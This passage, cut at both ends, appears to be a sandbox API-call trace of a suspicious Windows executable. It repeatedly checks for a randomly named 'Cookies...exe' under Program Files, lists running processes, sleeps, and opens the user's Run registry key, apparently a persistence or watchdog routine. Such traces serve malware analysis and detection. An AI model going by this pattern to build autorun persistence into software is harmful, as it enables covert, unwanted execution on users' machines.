FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.839] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0288.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0288.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0288.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0288.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0288.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0288.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0288.979] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0288.980] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0288.982] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0288.982] NtClose (Handle=0x338) returned 0x0 [0288.982] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.982] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.982] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0288.982] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.982] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0288.982] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0288.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0288.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0288.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0288.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0288.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0289.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0289.121] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0289.123] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0289.124] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0289.125] NtClose (Handle=0x338) returned 0x0 [0289.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.125] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.125] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0289.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.125] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.125] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0289.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0289.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0289.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0289.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0289.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0289.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0289.279] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0289.281] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0289.282] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0289.282] NtClose (Handle=0x338) returned 0x0 [0289.282] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.282] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.282] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de220) returned 1 [0289.283] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.283] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.283] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0289.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0289.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0289.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0289.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0289.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0289.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0289.391] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0289.393] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0289.394] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0289.394] NtClose (Handle=0x338) returned 0x0 [0289.394] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.394] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.394] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0289.394] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.395] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.395] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0289.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0289.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0289.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0289.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0289.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0289.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0289.538] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0289.539] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0289.541] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0289.541] NtClose (Handle=0x338) returned 0x0 [0289.541] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.541] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.541] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0289.541] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.541] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.541] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0289.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0289.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0289.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0289.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0289.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0289.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0289.692] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0289.694] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0289.695] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0289.695] NtClose (Handle=0x338) returned 0x0 [0289.695] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.695] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.695] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0289.695] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.695] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.695] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0289.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0289.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0289.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0289.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0289.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0289.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0289.838] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0289.840] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, 